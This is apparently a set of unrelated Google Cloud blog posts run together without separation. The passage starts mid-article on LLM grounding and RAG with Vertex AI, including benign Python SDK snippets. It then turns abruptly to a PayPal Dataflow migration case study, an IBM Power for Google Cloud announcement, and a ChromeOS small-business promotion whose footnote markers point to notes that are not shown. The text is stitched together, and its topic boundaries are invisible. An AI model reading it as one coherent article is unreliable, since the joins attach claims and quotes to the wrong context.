To overcome these challenges, we need to connect LLMs with sources of truth. This is where concepts like grounding, retrieval augmented generation (RAG), and search come into play. Grounding means providing an LLM with external information to root its response in reality, which reduces the chances of it hallucinating or making things up. RAG is a specific technique for grounding that finds relevant information from a knowledge base and gives it to the LLM as context. Search is the core retrieval technology behind RAG, as it’s how the system finds the right information in the knowledge base.
To unlock the true potential of gen AI, businesses need to ground their LLMs in what we at Google call enterprise truth: trusted internal data across documents, emails, and storage systems; third-party applications; and even fresh information from the internet that helps knowledge workers perform their jobs better.
By tapping into your enterprise truth, grounded LLMs can deliver more accurate, contextually relevant, and up-to-date responses, enabling you to use generative AI for real-world impact. This means enhanced customer service with more accurate and personalized support; automated tasks like generating reports and summarizing documents with greater accuracy; deeper insights derived from analyzing multiple data sources to identify trends and opportunities; and, ultimately, innovation through new products and services based on a richer understanding of customer needs and market trends.
Now let’s look at how you can easily overcome these challenges with the latest enhancements from Vertex AI, Google Cloud’s AI platform.
Tap into the latest knowledge from the internet
LLMs have a fundamental limitation: their knowledge is anchored to the data they were trained on, which becomes outdated over time. This impacts the quality of responses to any question that needs fresh data, such as the latest news, a company's 10-K results, or dates for a sports event or a concert. Grounding with Google Search allows the language model to find fresh information from the internet. It even provides source links so you can fact-check or learn more. Grounding with Google Search is offered with our Gemini models out of the box. Just toggle to turn it on, and Gemini will ground the answer using Google Search.
If you're not sure whether your next request requires grounding with Google Search, you can now use the new "dynamic retrieval" feature. Just turn it on, and Gemini will interpret your query and predict whether it needs up-to-date information to increase the accuracy of the answer. You can set the prediction score threshold at which Gemini will be triggered to use grounding with Google Search. This means you get the best of both worlds: high-quality results when you need them, and lower costs, because Gemini will only tap Google Search when needed for your users' queries.
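For developers, enabling grounding with Google Search is a small change in the Vertex AI Python SDK. The sketch below assumes a placeholder project and a Gemini 1.5 model; where supported, the dynamic retrieval threshold is configured on the same retrieval tool (check the SDK docs for the exact config object in your version):

```python
# Minimal sketch: grounding a Gemini response in Google Search results
# with the Vertex AI Python SDK. Project, region, and model are placeholders.
import vertexai
from vertexai.generative_models import GenerativeModel, Tool, grounding

vertexai.init(project="your-project-id", location="us-central1")

# Attach Google Search as a retrieval tool. Dynamic retrieval thresholds,
# where supported, are set on this GoogleSearchRetrieval config.
search_tool = Tool.from_google_search_retrieval(grounding.GoogleSearchRetrieval())

model = GenerativeModel("gemini-1.5-flash")
response = model.generate_content(
    "Who won the most recent Ballon d'Or?",
    tools=[search_tool],
)
print(response.text)  # Grounded answers include citation metadata for fact-checking.
```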
Connect data across all your enterprise truth
Connecting to fresh facts is just the start. The real value for any enterprise is grounding in its proprietary data. RAG is a technique that enhances LLMs by connecting them to non-training data sources, helping them retrieve information from this data before generating a response. There are several options available for RAG, but many don't work for enterprises because they lack quality, reliability, or scalability. The quality of grounded gen AI apps can only be as good as their ability to retrieve your data.
That's where Vertex AI comes in. Whether you are looking for a simple solution that works out of the box, want to build your own RAG system with APIs, or need highly performant vector embeddings for RAG, Vertex AI offers a comprehensive set of tools to meet your needs.
Here’s an easy guide to RAG for the enterprise:
First, use out-of-the-box RAG for most enterprise applications: Vertex AI Search simplifies the end-to-end information discovery process with Google-quality RAG (that is, search). With Vertex AI Search, Google Cloud manages your RAG service and all the various parts of building a RAG system: optical character recognition (OCR), data understanding and annotation, smart chunking, embedding, indexing, storing, query rewriting, spell checking, and so on. Vertex AI Search connects to your data, including your documents, websites, databases, and structured data, as well as third-party apps like Jira and Slack, with built-in connectors. The best part is that it can be set up in just a few minutes.
Developers can get a taste of grounding with Google Search and enterprise data in the Vertex Grounded Generation playground on GitHub, where you can compare grounded and ungrounded responses to queries side by side.
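As a sketch of how an application might query a Vertex AI Search app once it's set up, the following uses the google-cloud-discoveryengine client; every resource ID in the serving config path is a placeholder:

```python
# Minimal sketch: querying a Vertex AI Search app (Discovery Engine API).
# All IDs in the serving config path below are placeholders.
from google.cloud import discoveryengine_v1 as discoveryengine

client = discoveryengine.SearchServiceClient()
serving_config = (
    "projects/your-project-id/locations/global/collections/default_collection/"
    "engines/your-search-app/servingConfigs/default_serving_config"
)

request = discoveryengine.SearchRequest(
    serving_config=serving_config,
    query="What is our parental leave policy?",
    page_size=5,
)

# The response pager yields ranked results from your connected data sources.
for result in client.search(request):
    print(result.document.id)
```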
Then, build your own RAG for specific use cases: If you need to build your own RAG system, Vertex AI offers the various pieces off the shelf as individual APIs for layout parsing, ranking, grounded generation, check grounding, text embeddings and vector search. The layout parser can transform unstructured documents into structured representations and comes with multimodal understanding of charts and figures, which significantly enhances search quality across documents – like PDFs with embedded tables and images, which are challenging for many RAG systems.
Our vector search offering is particularly valuable for enterprises that need custom, highly performant, embeddings-based information retrieval. Vector search can scale to billions of vectors and find nearest neighbors in a few milliseconds, making it suitable for the needs of large enterprises. Vector search now offers hybrid search, which combines embeddings-based semantic search with keyword search to ensure the most relevant and accurate responses for your users.
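To illustrate the embeddings half of a build-your-own RAG pipeline, here is a minimal sketch using the Vertex AI text embeddings API. The model ID and chunk contents are illustrative, and the Vector Search upsert is summarized in comments since it assumes an index you have already created and deployed:

```python
# Minimal sketch: embedding document chunks for a custom RAG pipeline.
# Project, region, model ID, and chunk contents are placeholders.
import vertexai
from vertexai.language_models import TextEmbeddingModel

vertexai.init(project="your-project-id", location="us-central1")

embedding_model = TextEmbeddingModel.from_pretrained("text-embedding-004")

chunks = [
    "Refund policy: customers may return items within 30 days...",
    "Shipping policy: standard delivery takes 3-5 business days...",
]
vectors = [e.values for e in embedding_model.get_embeddings(chunks)]

# Each vector would then be upserted into a Vertex AI Vector Search index.
# At query time, the user's question is embedded the same way, the index
# returns the nearest-neighbor chunks, and those chunks are passed to the
# LLM as grounding context.
print(f"{len(vectors)} chunks embedded, {len(vectors[0])} dimensions each")
```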
No matter how you build your gen AI apps, thorough evaluation is essential to ensure they meet your specific needs. The gen AI evaluation service in Vertex AI empowers you to go beyond generic benchmarks and define your own evaluation criteria. This means you get a truly accurate picture of how well a model aligns with your unique use case, whether it's generating creative content or analyzing documents.
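As a sketch of what a custom evaluation can look like, the snippet below uses the EvalTask interface, which has shipped under vertexai.preview.evaluation in recent SDK releases. The module path, metric names, and dataset contents are assumptions to verify against the docs for your SDK version:

```python
# Minimal sketch: scoring your own model responses with the Vertex AI
# gen AI evaluation service. Dataset contents are placeholders; module
# path and metric names may vary by SDK release.
import pandas as pd
import vertexai
from vertexai.preview.evaluation import EvalTask

vertexai.init(project="your-project-id", location="us-central1")

eval_dataset = pd.DataFrame({
    "prompt": ["Summarize our Q3 results memo for the sales team."],
    "response": ["Q3 revenue grew 6% quarter over quarter, driven by..."],
})

# Bring-your-own-response evaluation: score existing outputs on criteria
# that matter to your use case rather than generic benchmarks.
eval_task = EvalTask(dataset=eval_dataset, metrics=["groundedness", "fluency"])
result = eval_task.evaluate()
print(result.summary_metrics)
```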
Moving beyond the hype for real world impact
The initial excitement surrounding gen AI has given way to a more pragmatic focus on real-world applications and tangible business value. Grounding is important for achieving this goal, ensuring that your AI models are not just generating text, but generating insights that are grounded in your unique enterprise truth.
Alaska Airlines is developing natural language search, providing travelers with a conversational experience powered by AI that’s akin to interacting with a knowledgeable travel agent. This chatbot aims to streamline travel booking, enhance customer experience, and reinforce brand identity.
Motorola Mobility’s Moto AI leverages Gemini and Imagen to help smartphone users unlock new levels of productivity, creativity, and enjoyment with features such as conversation summaries, notification digests, image creation, and natural language search — all with reliable responses grounded in Google Search.
Cintas is using Vertex AI Search to develop an internal knowledge center for customer service and sales teams to easily find key information.
Workday is using natural language processing in Vertex AI to make data insights more accessible for technical and non-technical users alike.
By embracing grounding, businesses can unlock the full potential of gen AI and lead the way in this transformative era. To learn more, check out my session from Gemini at Work where I cover our grounding offerings in more detail. Download our ebook to see how better search (including grounding) can lead to better business outcomes.
At PayPal, revolutionizing commerce globally has been a core mission for over 25 years. We create innovative experiences that make moving money, selling, and shopping simple, personalized, and secure, empowering consumers and businesses in approximately 200 markets. Ensuring the availability of services offered to both merchants and consumers is paramount.
PayPal’s journey with Dataflow has been a success – empowering the company to overcome streaming analytics challenges, unlock new opportunities, and build a more reliable, efficient, and scalable observability platform.
The observability platform team at PayPal is responsible for providing a telemetry platform for developers, technical account teams, and product managers. They own the SDKs, open telemetry collectors, and data streaming pipelines for receiving, processing, and exporting metrics and traces to their backend. PayPal developers rely on this observability platform for telemetry data to detect and fix problems in the shortest possible time. With applications running on diverse stacks like Java, Go, and Node.js, producing around three petabytes of logs per day, a robust, high-throughput, low-latency data streaming solution is critical for generating log-based metrics and traces.
Until 2023, PayPal’s observability platform used a self-managed Apache Flink-based infrastructure for streaming logs-based pipelines that generated metrics and spans. However, this solution presented several challenges:
Reliability: The system was highly unreliable, with no checkpointing in most pipelines, leading to data loss during restarts.
Efficiency: Managing the system was expensive and inefficient. Pipelines had to be planned for peak load, even if it occurred infrequently.
Security: The deployment needed to better conform to security guidelines.
Cluster management: Cluster creation and maintenance were manual tasks, requiring significant engineering time.
Community support: The solution was proprietary, limiting community support and collaboration.
Software upgrades: Customizations required updating the binary, which was no longer supported.
Long-term support: The solution was an end-of-sale product, placing business continuity at risk.
PayPal needed a cloud-native solution that could address these challenges and unlock new opportunities. Their key requirements included:
Effortless scalability: Handling massive data volumes and fluctuating workloads with automatic scaling and resource optimization.
Cost reduction: Optimizing resource utilization and eliminating costly infrastructure management.
Seamless integration: Connecting with other data and AI tools within PayPal’s ecosystem.
Empowering real-time AI/ML: Leveraging advanced streaming ML capabilities for data enrichment, model training, and real-time inference.
After extensive research and a successful proof of concept, PayPal decided to migrate to Google Cloud’s Dataflow. Dataflow is a fully managed, serverless streaming analytics platform built on Apache Beam, offering unparalleled scalability, flexibility, and cost-effectiveness.
The migration process involved several key steps:
Initial POC: PayPal tested and validated Dataflow’s capabilities to meet their specific requirements.
Pipeline optimization: Working with Google Cloud experts, PayPal fine-tuned pipelines for maximum efficiency, including redesigning the partitioning scheme and optimizing data shuffling.
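While PayPal's actual pipelines are proprietary, a log-based metrics pipeline of the kind described above might look something like this minimal Apache Beam sketch; the Pub/Sub topic, log schema, and the metric itself are all hypothetical:

```python
# Minimal, hypothetical sketch of a streaming log-based metrics pipeline
# on Dataflow using the Apache Beam Python SDK. The topic, log schema,
# and sink are placeholders, not PayPal's implementation.
import json

import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.transforms.window import FixedWindows

options = PipelineOptions(streaming=True)

with beam.Pipeline(options=options) as p:
    (
        p
        | "ReadLogs" >> beam.io.ReadFromPubSub(
            topic="projects/your-project/topics/app-logs")
        | "Parse" >> beam.Map(lambda msg: json.loads(msg.decode("utf-8")))
        | "KeyByService" >> beam.Map(lambda log: (log["service"], 1))
        # One-minute fixed windows turn a raw log stream into per-minute metrics.
        | "Window" >> beam.WindowInto(FixedWindows(60))
        | "CountPerService" >> beam.CombinePerKey(sum)
        | "Emit" >> beam.Map(lambda kv: print(f"{kv[0]}: {kv[1]} logs/min"))
    )
```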
Technical benefits
Dataflow’s automatic scaling capabilities ensure consistent performance and cost efficiency by dynamically adjusting resources based on real-time data demands. Its robust state management capabilities enable accurate and reliable real-time insights from complex streaming operations, while its ability to process data with minimal latency provides up-to-the-minute insights for faster decision-making. Additionally, Dataflow’s comprehensive monitoring tools and integration with other Google Cloud services simplify troubleshooting and performance optimization.
Fig 2. The execution details tab, showing data freshness by stage over time, with anomaly warnings.
Business benefits
The serverless architecture and dynamic resource allocation of Dataflow have significantly reduced infrastructure and operational costs for PayPal. They’ve also seen enhanced stability and uptime of critical streaming pipelines, leading to greater business continuity. Furthermore, Dataflow’s simplified programming model and rich tooling have accelerated development and deployment cycles, boosting developer productivity.
Implementing a high-throughput, low-latency streaming platform is critical to providing high-cardinality analytics to business teams, developers, and our command center teams. The Dataflow integration has empowered our engineering teams with a strong platform to monitor paypal.com 24x7, thereby ensuring PayPal is highly available for our consumers and merchants.
Perhaps most importantly, Dataflow has freed up PayPal's engineering resources to focus on high-value initiatives. This includes integrating with Google BigQuery for real-time Failed Customer Interaction (FCI) analytics, providing the Site Reliability Engineering team with immediate insights. They're also implementing real-time merchant monitoring, analyzing high-cardinality merchant API traffic for enhanced insights and risk management.
PayPal is excited to continue exploring Dataflow’s capabilities and further leverage its power to drive innovation and deliver exceptional experiences for their customers.
Back in January of 2020, we announced the availability of IBM Power Systems for Google Cloud. But while the pandemic accelerated cloud computing adoption, many large enterprises still faced challenges with critical workloads such as those often found on the Enterprise IBM Power platform.
At the beginning of 2022, we partnered with Converge Technology Solutions, a company with deep expertise in this market, to expand our support for customers with IBM Power workloads. Converge was already an important partner, and they have since upgraded the service, enhancing network connectivity to Google Cloud and bringing full support for the IBM i operating system.
Today, Converge Enterprise Cloud with IBM Power for Google Cloud, or simply IP4G, supports all three major environments for Power: AIX, IBM i, and Linux. In addition, it's now available in four new regions in production, two in Canada and two in EMEA, bringing the total to six.
Based on these developments and Converge’s expert engagement, we have seen a tremendous increase in customer adoption for IP4G.
“Infor was one of the original IP4G subscribers, and years later, we continue to run mission-critical IBM Power workloads in IP4G for our clients. IP4G’s availability and performance have more than met our requirements, and we are extremely satisfied with our overall IP4G experience.” – Scott Vassh, Vice President, WMS Development, Infor
Are you thinking of moving your IBM Power workloads to the cloud? For questions and information regarding custom cloud plans, please reach out to power4gcp@googlegroups.com. Your email is private to Converge and Google Cloud representatives, who will follow up with you. Looking for a bit more information first? Check out our data center migration and mainframe modernization solution webpages.
Saturday, November 30, 2024, is Small Business Saturday, a day when we celebrate and support small businesses and their impact on our economy and local communities. Like many small businesses, Google was built in a garage with the spirit of doing things differently.1 We are committed to providing tools and services that support local small businesses.2
Small businesses create jobs, drive innovation and contribute to the overall well-being of communities. In fact, 99.9% of American businesses are small.2 In addition, small businesses employ 45.9% of American workers, or about 59 million people, and make up 43.5% of US Gross Domestic Product (GDP).3
In addition to creating jobs for local talent, small businesses give back to their communities directly by contributing tax revenues and supporting community-based programs. Local charity programs rely on help from small businesses through sponsorship, volunteering, and fundraising efforts.4 With the support of their local chambers of commerce, small businesses are deeply ingrained in their communities, generating social and economic good.
Like any organization, small businesses rely on technology to run their operations. But when small businesses are time- and resource-strapped, it can be difficult to get the most out of technology. For instance, small businesses are three times more likely to be targeted by cyber criminals,5 and in a recent study, IT managers indicated they spend up to half their work week securing and managing devices.6 How can small businesses keep up? We believe it is critical to help small businesses succeed with devices that are secure, simple to manage, and affordable.
How ChromeOS empowers small businesses
ChromeOS, the OS at the heart of every ChromeOS device, is designed to keep businesses safe, simplify IT management, and save money.
Security
ChromeOS is the most secure OS out of the box.7 In other words, you are protected from the moment you boot up the machine, without having to add any antivirus software. In fact, there have been zero reported instances of successful virus or ransomware attacks on ChromeOS devices as of 2024.*
Calbag Metals is a West Coast leader in scrap metal recycling and is located in Portland, Oregon. Calbag’s mission is protecting the environment, recycling the past, and preserving the future. The business has been led by three family generations. As the business grew, they started to face integration challenges with a wide range of devices to manage, spending a significant amount of their work week on management. Recognizing the security benefits of ChromeOS, like not storing files locally, automatic updates, and easily blocking apps across all devices from one place, Calbag made the switch to ChromeOS.
We’re happy to leave the security to Google. The updates to ChromeOS are automatic and run in the background, so there’s no need to visit every workstation to confirm security,
Jim Perris
Senior Vice President of Finance and Operations, Calbag Metals
Simple to manage
When it comes to device management, ChromeOS gives time back; ChromeOS devices are 63% faster to deploy and 36% easier to manage than other operating systems.8
Sage Goddess is an e-commerce and e-learning provider for spiritual tools and teachings, reaching over two million people across the globe every week.
As the business grew with new employees and new devices, it needed cost-effective device management. Sage Goddess deployed 60 ChromeOS devices across different functions in the organization and was able to centrally manage the devices and keep them secure.
ChromeOS makes IT management easy, so we can focus on growing our business. We appreciate the simplicity because in the past, those management tasks were often time-consuming and complicated,
David Meizlik
President and COO, Sage Goddess
Save money
Chromebooks are generally more affordable than traditional laptops, making them an attractive option for budget-conscious small businesses. Additionally, ChromeOS devices require minimal maintenance or software add-ons, reducing IT costs.
One business benefiting from this is Triple Impact Connections, a veteran-owned business process outsourcing (BPO) company based in Killeen, Texas. Triple Impact Connections delivers contact center services for banking, healthcare, and retail. The company's management and agent workforce is made up almost entirely of military spouses and disabled veterans.
To stay competitive, Triple Impact Connections was looking to save on costs without compromising high performance. ChromeOS allows Triple Impact Connections to use ChromeOS devices for longer periods with automatic updates, helping the company save 30% on deployment costs when onboarding new employees.
ChromeOS devices are designed to be durable and receive 10 years of automatic updates,** allowing Triple Impact Connections agents to use them for longer periods and reduce device replacement costs. In addition, since ChromeOS automatically updates in the background, we can rest assured that our devices are secure—saving us $60,000 per year on cybersecurity monitoring,
These small businesses are all driving transformative change for their communities in their own unique ways. ChromeOS supports your journey by providing secure and cost-effective devices, freeing up IT teams, and giving time back to small business owners to do what they love. If you're a small business owner looking for security you can trust, explore the possibilities with ChromeOS. Visit ChromeOS to learn more, or try our quiz to learn how you can get started.
Ready to celebrate Small Business Saturday? Show your support by shopping local, leaving positive reviews, and spreading the word about your favorite small businesses.
*As of 2024, there has been no evidence of any documented, successful virus attack or ransomware attack on ChromeOS. Data based on ChromeOS monitoring of various national and internal databases.
**For devices prior to 2021 that are eligible to receive extended updates, some features and services may not be supported. See our Help Center for details.